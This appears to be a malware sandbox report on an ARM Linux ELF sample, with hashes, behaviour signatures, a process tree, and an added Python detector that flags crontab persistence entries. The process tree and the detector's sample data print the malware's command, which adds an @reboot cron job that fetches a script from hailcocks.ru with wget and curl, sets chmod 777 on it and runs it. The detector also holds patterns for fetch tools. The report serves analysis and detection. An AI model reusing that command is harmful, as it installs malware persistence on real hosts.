Analysis

  • max time kernel
    150s
  • max time network
    143s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhf
    image:debian9-armhf-20240611-en
    kernel:4.9.0-13-armmp-lpae
    locale:en-us
    os:debian-9-armhf
    system
  • submitted
    28-10-2024 01:45

General

  • Target

    b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf

  • Size

    73KB

  • MD5

    c84fca197a6c0d8da1e804407643d901

  • SHA1

    b18d35378928ff15d652cdb21e48d48abac2ffa8

  • SHA256

    b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51

  • SHA512

    eaed6b072815f9cde6d907a3b13356c982f6fbda66d3893dbb04ee57cd995bd7925d09612a6cf6f738aec6d61440c206bd64cabb935884c302714a2331331532

  • SSDEEP

    1536:Fjr84jhcwmCpuxo7UfezBWKcqE3Ei919UCDZ:Fjr84jSwm47welfcq89E6

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Renames itself 1 IoCs
  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system.

  • Changes its process name 1 IoCs
  • Reads runtime system information 46 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf
    /tmp/b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51.elf
    1⤵
    • Renames itself
    • Changes its process name
    • Reads runtime system information
    PID:653
    • /bin/sh
      sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      2⤵
      • File and Directory Permissions Modification
      PID:654
      • /usr/bin/crontab
        crontab -l
        3⤵
        • Reads runtime system information
        PID:661
      • /usr/bin/crontab
        crontab -
        3⤵
        • Creates/modifies Cron job
        • Reads runtime system information
        PID:659
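The `sh -c "(crontab -l ; echo ...) | crontab -"` step above is the classic way to append an entry to the current user's crontab without clobbering existing ones: `crontab -l` prints the present entries, `echo` adds the new `@reboot` line, and `crontab -` installs the combined text (which is what the `tmp.TxaXvK` file in the Downloads section is). The Python below is an added example, not code from the report or from the sample, that parses crontab text and flags entries combining a remote fetch with staging traits (working in /tmp, `chmod 777`, running a relative-path script, `@reboot`). The observed entry and its URL come from the process tree above; the other lines in `SAMPLE_CRONTAB`, and the names `scan_crontab`, `assess` and `scan_spool`, are constructed for this example.

```python
"""Flag crontab entries that look like download-and-execute persistence.
Added example; not part of the sandbox report or the analysed sample."""
import os
import re
from dataclasses import dataclass

# Constructed sample: line 4 is the entry the sandbox observed being written
# with "(crontab -l ; echo \"...\") | crontab -"; lines 2-3 are benign
# entries made up here for contrast.
SAMPLE_CRONTAB = """\
# m h  dom mon dow   command
0 3 * * * /usr/bin/apt-get update >/dev/null 2>&1
@daily /usr/local/bin/backup.sh
@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh
"""

SPECIAL = {"@reboot", "@yearly", "@annually", "@monthly", "@weekly",
           "@daily", "@midnight", "@hourly"}
URL_RE = re.compile(r"(?:https?|ftp|tftp)://[^\s'\";|&)]+")
FETCH_RE = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b")
CHMOD_RE = re.compile(r"\bchmod\s+(?:-\w+\s+)*(\S+)")
TMPDIR_RE = re.compile(r"(?<![\w.-])/(?:tmp|var/tmp|dev/shm)(?![\w.-])")
RELEXEC_RE = re.compile(r"(?:^|[;&|]\s*)\./\S+")


@dataclass
class Finding:
    line_no: int
    schedule: str
    command: str
    reasons: list
    urls: list


def split_entry(line):
    """Return (schedule, command) for a crontab entry, or None for
    comments, blank lines and VAR=value assignments."""
    s = line.strip()
    if not s or s.startswith("#"):
        return None
    if s.startswith("@"):
        parts = s.split(None, 1)
        return (parts[0], parts[1]) if len(parts) == 2 and parts[0] in SPECIAL else None
    parts = s.split(None, 5)
    if len(parts) == 6 and "=" not in parts[0]:
        return " ".join(parts[:5]), parts[5]
    return None


def assess(schedule, command):
    """Collect the traits that make a cron command look like a dropper.
    Returns (suspicious, reasons, urls)."""
    reasons, urls = [], URL_RE.findall(command)
    fetches = bool(FETCH_RE.search(command) and urls)
    if fetches:
        reasons.append("fetches remote payload")
    m = CHMOD_RE.search(command)
    if m:
        mode = m.group(1)
        if re.fullmatch(r"[0-7]{1,4}", mode) and int(mode, 8) & 0o002:
            reasons.append(f"chmod {mode} (world-writable)")
        else:
            reasons.append(f"chmod {mode}")
    if TMPDIR_RE.search(command):
        reasons.append("works in a world-writable temp dir")
    if RELEXEC_RE.search(command):
        reasons.append("runs a relative-path script")
    if schedule == "@reboot":
        reasons.append("@reboot persistence")
    # A remote fetch alone (e.g. a legitimate health check or updater) is
    # not enough; require at least one staging trait on top of it.
    suspicious = fetches and len(reasons) >= 2
    return suspicious, reasons, urls


def scan_crontab(text):
    """Scan one crontab's text and return the suspicious entries."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        entry = split_entry(line)
        if not entry:
            continue
        sched, cmd = entry
        suspicious, reasons, urls = assess(sched, cmd)
        if suspicious:
            findings.append(Finding(n, sched, cmd, reasons, urls))
    return findings


def scan_spool(spool="/var/spool/cron/crontabs"):
    """Scan every per-user crontab in the Debian spool directory (the path
    seen in the Downloads section). Needs root; returns {user: findings}."""
    results = {}
    if not os.path.isdir(spool):
        return results
    for user in sorted(os.listdir(spool)):
        try:
            with open(os.path.join(spool, user), errors="replace") as fh:
                hits = scan_crontab(fh.read())
        except OSError:
            continue
        if hits:
            results[user] = hits
    return results


if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: {f.schedule} -> {', '.join(f.reasons)}")
        for u in sorted(set(f.urls)):
            print("   IoC:", u)
    for user, hits in scan_spool().items():
        print(f"{user}: {len(hits)} suspicious entries")
```

On a live host, also check `/etc/crontab`, `/etc/cron.d/` and the `cron.*` directories, which this spool scan does not cover, and treat the spool file's hash (listed under Downloads) as the quick indicator for this particular drop.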

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /var/spool/cron/crontabs/tmp.TxaXvK

    Filesize

    306B

    MD5

    166013c72061a26359c4b71ea7e3f82c

    SHA1

    22f63cee554a4e6dade457c043fb687d6843b9e7

    SHA256

    9ae205f20ff39c525193c69898b9fb677905ed2e6b9de9a42311135923fe96fe

    SHA512

    bf5812345971eed2131e77131faccf5a779ebb92bb2b628c056fa339a0d714cba6fd370b5d0db55c439eac4833d9a097867167cfb0c5c70368a5b2563b1fdc06